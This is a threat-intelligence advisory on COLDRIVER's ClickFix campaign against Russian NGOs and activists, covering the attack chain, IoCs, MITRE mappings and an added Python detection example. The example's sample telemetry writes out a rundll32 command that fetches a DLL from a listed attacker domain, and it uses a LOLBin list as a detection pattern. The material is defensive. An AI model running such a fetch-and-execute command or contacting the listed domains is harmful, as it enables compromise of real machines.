
COLDRIVER’s ClickFix Campaign Targets Civil Voices

Amber | Attack Report

COLDRIVER ClickFix Campaign Targets Russian Civil Society

Summary

In September 2025, researchers identified a new ClickFix campaign orchestrated by COLDRIVER (aka Nahr el Bared, Seaborgium, BlueCharlie, Star Blizzard, TA446, UNC4057). This campaign specifically targets Russian civil society, NGOs, activists, and think tanks, leveraging social engineering and malicious command execution to gain remote access.

The attack employs a fake Cloudflare Turnstile verification to trick victims into copying and executing a malicious command, which triggers the BAITSWITCH downloader. BAITSWITCH then delivers the SIMPLEFIX PowerShell backdoor, granting attackers persistent remote control. This operation reflects COLDRIVER’s focus on espionage and dissident surveillance, showing that even lightweight malware can be highly effective when paired with psychological manipulation.

Attack Details

The attack chain follows a multi-stage infection process:

  • Initial Access: Victims are lured to websites mimicking civil society resources. A fake security check (the ClickFix method) prompts users to paste and run a malicious command in the Windows Run dialog.

  • BAITSWITCH Downloader:

    • Delivered via rundll32.exe; establishes persistence on the host.

    • Contacts attacker-controlled domain, fetches instructions, and downloads SIMPLEFIX.

    • Executes commands via CreateProcessA, providing attackers with a foothold.

  • SIMPLEFIX Backdoor:

    • Loaded via obfuscated Base64 and AES-encrypted payloads stored in registry keys.

    • Maintains persistence, dynamically generates user-agent strings, and sends periodic C2 beacons every three minutes.

  • Attribution: Linked to COLDRIVER based on infrastructure overlaps, TTP similarities, and victimology, aligning with previous campaigns against NGOs and exiled activists.
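The two telemetry signals this chain leaves behind, a LOLBin launched from the Run dialog with a URL on its command line and a C2 beacon on a fixed three-minute cadence, can be hunted for with the following added detection example. It is not code from the advisory or from Hive Force Labs; the process records, proxy lines and hostnames are constructed samples, and the domain set is taken from the IoC section above.

```python
import re
from collections import defaultdict
from datetime import datetime
# Domains from the advisory's IoC section, with the defanging brackets removed.
IOC_DOMAINS = {"preentootmist.org", "blintepeeste.org", "captchanom.top", "southprovesolutions.com"}
LOLBINS = {"rundll32.exe", "powershell.exe", "cmd.exe", "mshta.exe"}
URL_RE = re.compile(r"https?://([^/\s\"']+)", re.I)

def clickfix_process_alerts(events):
    """ClickFix pattern: a LOLBin spawned by explorer.exe (the Run dialog's parent)
    with a URL on its command line. Returns (host, image, url_host, ioc_match)."""
    alerts = []
    for e in events:
        image = e["image"].rsplit("\\", 1)[-1].lower()
        parent = e["parent_image"].rsplit("\\", 1)[-1].lower()
        m = URL_RE.search(e["command_line"])
        if image in LOLBINS and parent == "explorer.exe" and m:
            host = m.group(1).lower()
            alerts.append((e["host"], image, host, host in IOC_DOMAINS))
    return alerts

def beacon_alerts(proxy_lines, period=180, tolerance=15, min_hits=4):
    """Flag (src, dst) pairs whose requests recur at a fixed interval, like the
    three-minute SIMPLEFIX C2 beacon. Lines are '<iso-timestamp> <src> <dst>'."""
    seen = defaultdict(list)
    for line in proxy_lines:
        ts, src, dst = line.split()[:3]
        seen[(src, dst)].append(datetime.fromisoformat(ts))
    hits = []
    for (src, dst), times in seen.items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        regular = sum(abs(g - period) <= tolerance for g in gaps)
        if len(times) >= min_hits and regular >= 0.75 * len(gaps):
            hits.append((src, dst, dst in IOC_DOMAINS))
    return hits
# Constructed sample telemetry (not from the advisory): one ClickFix-style launch,
# one benign launch, one host beaconing every ~3 minutes, one browsing irregularly.
SAMPLE_EVENTS = [
    {"host": "ws01", "image": r"C:\Windows\System32\rundll32.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "rundll32.exe https://captchanom.top/check/machinerie.dll"},
    {"host": "ws02", "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "notepad.exe notes.txt"},
]
SAMPLE_PROXY = [f"2025-09-20T10:{m:02d}:{s:02d} ws01 captchanom.top"
                for m, s in [(0, 0), (3, 2), (6, 1), (9, 3), (12, 0)]]
SAMPLE_PROXY += ["2025-09-20T10:00:00 ws02 example.com", "2025-09-20T10:00:40 ws02 example.com",
                 "2025-09-20T10:07:15 ws02 example.com", "2025-09-20T10:31:05 ws02 example.com"]
```

The process rule fires on any Run-dialog LOLBin launch carrying a URL, not only on the listed domains, so it still catches the technique after the infrastructure rotates; the beacon rule tolerates the jitter that a real-world 180-second timer shows in proxy logs.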

Recommendations

  • Be Cautious of Clipboard Prompts: Treat any website that asks you to copy and run commands in the Run dialog as malicious.

  • Limit Privileges: Enforce least privilege principles, restricting administrative rights to minimize potential impact.

  • Browser Isolation: Use cloud-based or sandboxed browsing environments to contain malicious code.

  • Patch Regularly: Keep operating systems, browsers, and security tools fully updated to reduce exploitability.

  • Deploy EDR & NGAV: Implement solutions that leverage behavioral analysis and machine learning to detect and block malware like BAITSWITCH and SIMPLEFIX.

Indicators of Compromise (IoCs)

Domains

  • preentootmist[.]org

  • blintepeeste[.]org

  • captchanom[.]top

  • southprovesolutions[.]com

URLs (Samples)

  • hxxps[:]//preentootmist[.]org/?uinfo_message=Resilient_Voices

  • hxxps[:]//captchanom[.]top/check/machinerie[.]dll

  • hxxps[:]//southprovesolutions[.]com/VUkXugsYgu

  • hxxps[:]//drive[.]google[.]com/file/d/1UiiDBT33N7unppa4UMS4NY2oOJCM-96T/view

SHA256 Hashes

  • 87138f63974a8ccbbf5840c31165f1a4bf92a954bacccfbf1e7e5525d750aa48

  • 62ab5a28801d2d7d607e591b7b2a1e9ae0bfc83f9ceda8a998e5e397b58623a0

  • 16a79e36d9b371d1557310cb28d412207827db2759d795f4d8e27d5f5afaf63f

Email

  • narnobudaeva[@]gmail[.]com

MITRE ATT&CK TTPs

  • Resource Development: T1583 (Acquire Infrastructure), T1583.001 (Domains), T1585 (Establish Accounts), T1587 (Develop Capabilities), T1608 (Stage Capabilities)

  • Initial Access: T1566 (Phishing), T1204.004 (Malicious Copy & Paste)

  • Execution: T1059 (Command & Scripting Interpreter), T1059.001 (PowerShell), T1059.003 (Windows Command Shell), T1218.011 (Rundll32)

  • Persistence: T1037.001 (Logon Script), T1112 (Modify Registry)

  • Defense Evasion: T1027.011 (Fileless Storage), T1564.003 (Hidden Window)

  • Discovery: T1082 (System Information Discovery), T1087.001 (Local Account Discovery)

  • Collection & Exfiltration: T1005 (Data from Local System), T1041 (Exfiltration Over C2 Channel)

  • Command & Control: T1071.001 (Web Protocols), T1573.002 (Asymmetric Cryptography)
